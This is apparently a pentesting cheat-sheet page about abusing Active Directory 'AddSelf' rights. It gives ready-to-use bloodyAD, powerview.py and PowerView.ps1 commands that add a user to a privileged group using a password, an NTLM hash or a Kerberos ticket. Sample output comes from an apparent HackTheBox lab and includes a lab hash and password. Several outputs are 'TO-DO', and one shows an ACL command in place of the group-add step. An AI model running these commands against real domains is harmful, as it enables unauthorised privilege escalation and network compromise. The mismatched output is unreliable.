TLDRBins TLDRBins / AddSelf


Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Authentication Method

Add Self to Group

1. Add Self to Group

# Password bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output: TO-DO
# NTLM bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output: TO-DO
# Password-based Kerberos bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output: TO-DO
# NTLM-based Kerberos bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output: TO-DO
# Ticket-based Kerberos bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output: TO-DO

Ref: bloodyAD

1. Connect

# Password powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'
Sample Output: $ powerview 'haze.htb/haze-it-backup$:Password123!@DC01.haze.htb' ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯
# NTLM powerview '<DOMAIN>/<USER>@<TARGET>' -H '<HASH>'
Sample Output: $ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -H '735c02c6b2dc54c3c8c6891f55279ebc' ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯
# Password-based Kerberos powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -k
Sample Output: $ powerview 'haze.htb/haze-it-backup$:Password123!@DC01.haze.htb' -k ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯
# NTLM-based Kerberos powerview '<DOMAIN>/<USER>@<TARGET>' -H '<HASH>' -k
Sample Output: $ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -H '735c02c6b2dc54c3c8c6891f55279ebc' -k ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯
# Ticket-based Kerberos powerview '<DOMAIN>/<USER>@<TARGET>' -k
Sample Output: $ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -k --no-pass ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯

2. Add Self to Group

Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>'
Sample Output: ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯ Add-DomainObjectAcl -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$' -Rights fullcontrol [2025-10-31 22:23:23] [Add-DomainObjectACL] Found target identity: CN=Support_Services,CN=Users,DC=haze,DC=htb [2025-10-31 22:23:23] [Add-DomainObjectACL] Found principal identity: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb [2025-10-31 22:23:23] Adding FullControl to S-1-5-21-323145914-28650650-2368316563-1112 [2025-10-31 22:23:23] [Add-DomainObjectACL] Success! Added ACL to CN=Support_Services,CN=Users,DC=haze,DC=htb

Ref: powerview.py

1. Import PowerView

. .\PowerView.ps1
Sample Output: evil-winrm-py PS C:\programdata> . .\PowerView.ps1

2. Add Self to the Group

Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>'
Sample Output: evil-winrm-py PS C:\programdata> Add-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Members 'haze-it-backup$'

4. Check

Get-DomainGroupMember -Identity '<GROUP>' -Domain <DOMAIN> -DomainController <DC> | fl MemberName
Sample Output: evil-winrm-py PS C:\programdata> Get-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Domain haze.htb -DomainController dc01.haze.htb | fl MemberName MemberName : Haze-IT-Backup$